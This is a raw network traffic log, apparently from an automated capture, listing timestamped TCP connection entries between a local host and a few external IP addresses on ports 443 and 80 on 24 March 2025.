Mar 24, 2025 17:30:29.698653936 CET	443	49701	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:29.700350046 CET	49701	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:29.700448036 CET	443	49701	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:29.700512886 CET	49701	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:29.708782911 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:29.708867073 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:29.708947897 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:29.709136009 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:29.709163904 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:30.051939011 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:30.052041054 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:30.052824020 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:30.052834034 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:30.053102016 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:30.053630114 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:30.053658962 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:30.390774012 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:30.390801907 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:30.390863895 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:30.390873909 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:30.390942097 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:30.393774986 CET	49712	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:30.393799067 CET	443	49712	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:39.607297897 CET	49713	80	192.168.2.8	3.133.160.140
Mar 24, 2025 17:30:39.725342035 CET	80	49713	3.133.160.140	192.168.2.8
Mar 24, 2025 17:30:39.725433111 CET	49713	80	192.168.2.8	3.133.160.140
Mar 24, 2025 17:30:39.727372885 CET	49713	80	192.168.2.8	3.133.160.140
Mar 24, 2025 17:30:39.842175961 CET	80	49713	3.133.160.140	192.168.2.8
Mar 24, 2025 17:30:40.468264103 CET	80	49713	3.133.160.140	192.168.2.8
Mar 24, 2025 17:30:40.535531998 CET	49713	80	192.168.2.8	3.133.160.140
Mar 24, 2025 17:30:40.623322010 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:40.623378038 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:40.623509884 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:40.633902073 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:40.633934021 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:40.873478889 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:40.873756886 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:40.878367901 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:40.878384113 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:40.878689051 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:40.891345978 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:40.936328888 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.152252913 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.152823925 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.152839899 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.152959108 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.152987003 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.155343056 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.266866922 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.266901970 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267052889 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267102957 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.267131090 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267179966 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267203093 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267206907 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.267219067 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267231941 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.267334938 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.267524958 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267555952 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267582893 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267589092 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.267595053 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.267618895 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.271338940 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.368288040 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.379093885 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.379117012 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.379153013 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.379163980 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.379194975 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.379225969 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.382740974 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.382771015 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.382797956 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.382814884 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.382849932 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.383341074 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.383357048 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.383393049 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.383394003 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.383404016 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.383433104 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.383471012 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.383649111 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.383666039 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.383692026 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.383694887 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.383708000 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.383729935 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.384011984 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.384048939 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.384057045 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.384063959 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.384090900 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.391052008 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.391073942 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.391113997 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.421278000 CET	49671	443	192.168.2.8	204.79.197.203
Mar 24, 2025 17:30:41.493001938 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.493043900 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.493072987 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.493087053 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.493098021 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.493133068 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.493411064 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.493432045 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.493458033 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.493472099 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.493494987 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.494091988 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.494122028 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.494138002 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.494147062 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.494168997 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.494188070 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.496582031 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.496623993 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.496639967 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.496650934 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.496669054 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.496687889 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.496691942 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.497000933 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.497021914 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.497051001 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.497057915 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.497082949 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.497296095 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.497325897 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.497349024 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.497353077 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.497374058 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.498580933 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.498610020 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.498639107 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.498646975 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.498676062 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.499150991 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.499183893 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.499208927 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.499216080 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.499242067 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.499262094 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.499439955 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.499456882 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.499494076 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.499500036 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.499512911 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.499538898 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.499960899 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.499980927 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.500000000 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.500006914 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.500032902 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.500457048 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.500485897 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.500507116 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.500516891 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.500524998 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.500550032 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.500571966 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.551017046 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.723052025 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.723083973 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.723120928 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.723124027 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.723151922 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.723170042 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.723170042 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.723177910 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.723202944 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.723223925 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.723231077 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.723249912 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.724584103 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.724617004 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.724637985 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.724646091 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.724661112 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.724666119 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.724682093 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.724704981 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.724709988 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.724733114 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.724755049 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.724759102 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727216959 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727238894 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727292061 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.727302074 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727322102 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727343082 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727364063 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.727370024 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727391005 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.727413893 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727437973 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727456093 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.727463961 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.727484941 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.727511883 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728303909 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728347063 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728370905 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728377104 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728390932 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728410959 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728415012 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728647947 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728671074 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728707075 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728713036 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728729963 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728733063 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728760958 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728782892 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728789091 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728807926 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728837013 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728858948 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728878021 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728883028 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728905916 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728923082 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728946924 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728967905 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.728975058 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.728996038 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.729013920 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.731403112 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731420994 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731465101 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.731470108 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731481075 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731502056 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.731511116 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731528997 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731550932 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.731559992 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731580973 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.731771946 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731805086 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731813908 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.731822968 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.731844902 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.733011007 CET	49671	443	192.168.2.8	204.79.197.203
Mar 24, 2025 17:30:41.779831886 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.992326021 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.993860960 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:41.993875027 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:41.993935108 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.005460978 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.005465984 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005476952 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005500078 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005568027 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.005573034 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005588055 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005601883 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005644083 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.005665064 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005680084 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005695105 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005709887 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.005718946 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005726099 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005753040 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005774975 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005794048 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.005798101 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.005899906 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.216317892 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.216366053 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.342541933 CET	49671	443	192.168.2.8	204.79.197.203
Mar 24, 2025 17:30:42.545209885 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.545229912 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.545382977 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.556152105 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.556159019 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556170940 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556355000 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.556360006 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556374073 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556548119 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.556555033 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556587934 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556603909 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556765079 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.556771994 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556783915 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556812048 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556816101 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556879997 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.556884050 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.556899071 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.557075024 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.557075024 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:42.764336109 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:42.764431953 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.017802000 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.017838001 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.018834114 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.022664070 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.022692919 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.022716999 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.022728920 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.023355961 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.023366928 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.023413897 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.023437977 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.023634911 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.023634911 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.023639917 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.023682117 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.023920059 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.228364944 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.228475094 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.545645952 CET	49671	443	192.168.2.8	204.79.197.203
Mar 24, 2025 17:30:43.660332918 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.660382986 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.981683969 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.981714964 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.981779099 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.988836050 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.988857985 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.988873005 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.988882065 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.988936901 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.988948107 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.988960981 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.988970995 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.989048958 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.989056110 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.989068031 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.989074945 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.989239931 CET	49714	443	192.168.2.8	52.219.108.138
Mar 24, 2025 17:30:43.989247084 CET	443	49714	52.219.108.138	192.168.2.8
Mar 24, 2025 17:30:43.989267111 CET	443	49714	52.219.108.138	192.168.2.8
